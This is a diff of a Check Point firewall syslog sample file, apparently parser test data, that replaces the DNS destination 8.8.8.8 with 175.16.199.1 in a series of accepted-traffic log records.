 <134>1 2020-03-29T16:58:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ba,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64726"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -1828,30 +1828,30 @@
 <134>1 2020-03-29T16:58:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3bb,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35219"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:02Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3d6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3d7,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3d9,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501145"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501146"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45096"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3d9,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501145"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501146"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45096"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35138"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3db,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501147"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44471"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3db,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501147"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44471"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58894"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58896"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58892"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41652"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41652"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.168.232"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57792"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"194.29.39.47"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33728"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37359"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37359"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47294"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35152"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
